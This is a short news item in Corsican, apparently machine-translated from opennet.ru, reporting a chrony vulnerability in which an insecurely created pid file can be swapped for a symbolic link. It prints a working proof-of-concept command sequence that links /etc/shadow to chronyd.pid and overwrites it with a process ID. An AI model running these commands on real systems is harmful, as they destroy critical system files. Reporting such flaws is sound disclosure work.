В
A vulnerabilità hè causata da a creazione micca sicura di un schedariu pid, chì hè stata creata in un stadiu quandu chrony ùn avia ancu resettatu i privilegi è era in esecuzione cum'è root. In questu casu, u cartulare /run/chrony, in quale hè scrittu u schedariu pid, hè statu creatu cù diritti 0750 via systemd-tmpfiles o quandu chronyd hè stata lanciata in associu cù l'utilizatori è u gruppu "chrony". Cusì, sè vo avete accessu à a crona di l'utilizatori, hè pussibule rimpiazzà u schedariu pid /run/chrony/chronyd.pid cù un ligame simbolicu. Un ligame simbolicu pò indicà à qualsiasi schedariu di u sistema chì serà sovrascrittu quandu chronyd hè lanciatu.
root # systemctl stop chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
chrony$ uscita
root # /usr/sbin/chronyd -n
^C
# invece di u cuntenutu di /etc/shadow l'ID di prucessu chronyd serà salvatu
root # cat /etc/shadow
15287
Vulnerabilità
SUSE è openSUSE prublema
Source: opennet.ru